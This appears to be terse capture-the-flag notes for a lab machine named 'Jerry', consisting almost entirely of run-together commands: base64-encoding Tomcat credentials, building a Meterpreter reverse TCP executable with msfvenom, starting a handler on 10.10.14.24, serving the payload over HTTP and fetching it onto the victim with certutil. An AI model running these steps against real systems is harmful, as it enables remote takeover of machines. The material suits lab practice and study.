Jerry
for cred in $(cat tomcat.txt); do echo -n $cred | base64; done
whoami cd c:\users\administrator cd Desktop cd flags dir arp -amsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=5555 -f exe > sh.exesudo msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp options set LHOST 10.10.14.24 set LPORT 5555 runpython -m SimpleHTTPServer 80 <-- start server on attacker certutil -urlcache -f http://10.10.14.24/sh.exe c:\users\administrator\desktop\flags\sh.exe <-- On victim dir sh.exe
Last updated